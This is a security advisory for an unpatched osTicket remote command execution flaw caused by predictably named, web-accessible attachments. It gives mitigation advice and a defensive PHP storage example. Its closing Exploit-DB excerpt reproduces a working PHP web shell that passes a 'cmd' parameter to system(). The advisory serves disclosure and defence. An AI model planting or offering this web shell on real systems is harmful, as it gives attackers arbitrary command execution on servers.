Vendor: osTicket
CVSS: 7.5 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: osTicket
Patch Exists: NO

osTicket Remote Command Execution Vulnerability

osTicket is prone to a remote command execution vulnerability. Attachments submitted as part of a support ticket request are stored with a predictable name in a known web accessible location. An attacker can exploit this vulnerability by submitting a malicious attachment and executing arbitrary commands on the affected system.

Mitigation:

To mitigate this vulnerability, ensure that attachments are properly sanitized and stored with unpredictable names. Additionally, consider implementing access controls to limit public access to attachment directories.
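
One way to apply the mitigation above in PHP, as an added example that is not osTicket's own code: attachments get a random on-disk name in a directory outside the web root and are only served back through a download function. ATTACHMENT_DIR, ALLOWED_EXT, store_attachment() and send_attachment() are hypothetical names and values chosen for illustration, and the authorization check before send_attachment() is assumed to exist in the calling code.

```php
<?php
declare(strict_types=1);
// Added example, not osTicket code. The directory and allowlist are assumptions.
const ATTACHMENT_DIR = '/var/lib/helpdesk/attachments'; // assumed: outside the web root
const ALLOWED_EXT = ['pdf', 'png', 'jpg', 'txt', 'log']; // assumed allowlist
// Move an upload into $dir under a random name and return that name.
// $mover defaults to move_uploaded_file(); the CLI demo below passes 'copy'.
function store_attachment(string $tmp, string $clientName, string $dir = ATTACHMENT_DIR, ?callable $mover = null): string
{
    // The client-supplied name is only checked, never used as the on-disk name.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new InvalidArgumentException("attachment type not allowed: $ext");
    }
    // 128 bits from the CSPRNG plus a fixed .bin suffix: the stored name is
    // neither guessable nor tied to the extension the client sent.
    $stored = bin2hex(random_bytes(16)) . '.bin';
    $dest = rtrim($dir, '/') . '/' . $stored;
    if (!($mover ?? 'move_uploaded_file')($tmp, $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($dest, 0640);
    return $stored;
}

// Stream a stored attachment as a download, after the caller has checked ticket access.
function send_attachment(string $stored, string $displayName, string $dir = ATTACHMENT_DIR): void
{
    if (!preg_match('/\A[0-9a-f]{32}\.bin\z/', $stored)) {
        throw new InvalidArgumentException('bad attachment id');
    }
    $safe = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($displayName));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safe . '"');
    header('X-Content-Type-Options: nosniff');
    readfile(rtrim($dir, '/') . '/' . $stored);
}
// CLI demo on constructed input: a temp file stands in for the upload.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir();
    $tmp = tempnam($dir, 'up');
    file_put_contents($tmp, "constructed sample attachment\n");
    echo store_attachment($tmp, 'report.PDF', $dir, 'copy'), "\n";
    try {
        store_attachment($tmp, 'notes.php', $dir, 'copy');
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The mapping from the stored name back to the original file name and ticket would live in the application's database, so nothing in the storage directory is addressable by a URL.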
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10586/info

osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location.

<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>